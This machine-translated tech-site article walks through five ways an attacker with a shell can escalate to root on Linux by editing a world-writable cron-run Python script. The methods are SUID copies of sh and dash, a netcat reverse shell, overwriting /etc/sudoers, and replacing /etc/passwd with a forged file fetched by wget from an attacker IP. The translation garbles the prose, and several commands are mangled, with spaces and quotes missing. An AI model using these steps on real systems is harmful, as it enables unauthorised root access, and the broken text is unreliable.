Shulou(Shulou.com)06/02 Report--

In this issue, Xiaobian will bring you about how to achieve the promotion of Linux through writable files. The article is rich in content and analyzed and described from a professional perspective. After reading this article, I hope you can gain something.

On Linux, everything exists as a file, including directories and devices, which have read, write, and execute permissions (configuration required). When an administrator sets file permissions, they must be set according to the specific circumstances of the Linux user.

We'll talk about how to use writable files/scripts to enable power lifting under Linux. So let's get straight to the point.

Turn on your computer, hack into the target system, and we'll go straight to the upgrade. Suppose I have successfully logged into the target device via ssh and then accessed a non-root terminal. Next, enumerate all files that have writeable permissions using the following command:

find / -writable -type f 2>/dev/null | grep -v "/proc/"

As you can see, there is a python file stored in the/lib/log directory in the result. After looking at it, we find that the permissions of sanitizer.py are 777:

It seems that this file is used by administrators to clean up the/tmp directory garbage, which is automatically executed after a certain time interval. If attackers also discover this, then they can achieve empowerment in the following way.

the first method

Copy/bin/sh to/tmp and enable SUID of/tmp/sh. This method is simple. First open the file with an editor, such as "nanosanitizer.py", and replace "rm -r/tmp" with the following:

os.system('cp/bin/sh /tmp/sh')os.system('chmodu+s /tmp/sh')

Next, it creates a sh file with SUID privileges in/tmp, and you run it to get root privileges.

cd /tmpls./ shidwhoami

the second method

As before, you can replace "rm -r /tmp" with the following:

os.system('chmod u+s /bin/dash)

After a while, it will set SUID permissions on/bin/dash files, and when you run it, you will get root privileges:

/bin/dashidwhoami

the third method

Here we need to copy the python reverse shell connection code to "rm -r /tmp/*" here, and then open the netcat listener in the new terminal:

After a while you will get a reverse shell connection through netcat and get root privileges:

nc-lvp 1234idwhoami

the fourth method

This is one of the most interesting ways we can log in to the target device using sudo privileges. As you can see, wernerbrands cannot run sudo right now:

Replace "rm -r /tmp/*" with the following:

os.system('echo"wernerbrandes ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers')

After a certain time, when you run "sudo -l" command, you will find that this account has become sudo user, and then you can get root privileges:

sudo -lsudo bashid the fifth method

In any Linux-like system, the passwd file is important, and if an attacker can access or modify it, it becomes a means of authorization. With scriptable help, we can access the etc/passwd file using the cat command.

You can see the nemo user information highlighted in the image below. I guess UID:1000 & GID:1000 means that the user is probably in the administrator group. We need to modify the nemo record and make it a member of the root group. First, copy the contents of the etc/passwd file into a blank text file.

Then in the new terminal, generate salt password:

openssl passwd -1 -salt abc 123

Copy the salt password to the "X" position of the nemo user record entry and change the previous UID&GID to 0:0. After completing all the steps, save the newly created text file to "passwd" and copy it to the target host to overwrite the original passwd file.

cd Desktoppython -m SimpleHTTPServer 80

Using writable scripts, replace "rm -r /tmp/*" with the following command:

os.system('chmod u+s /bin/cp)

After a while it will enable SUID permissions on/bin/cp and complete the file copy.

Copy the modified passwd file to the target host's/tmp directory and enter the following command:

cd /tmpwget http://192.168.1.103/passwdls -al /bin/cpcp passwd /etc/passwd

Use the following command to see if the passwd file was successfully replaced:

tail /etc/passwd

Get root privileges by issuing the following command:

su nemopassword123whoami

In this article we show you how attackers can use writable files to achieve power, I hope you like it.

The above is a small series for everyone to share how to achieve the promotion of power under Linux through writable files, if there is a similar doubt, may wish to refer to the above analysis to understand. If you want to know more about it, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.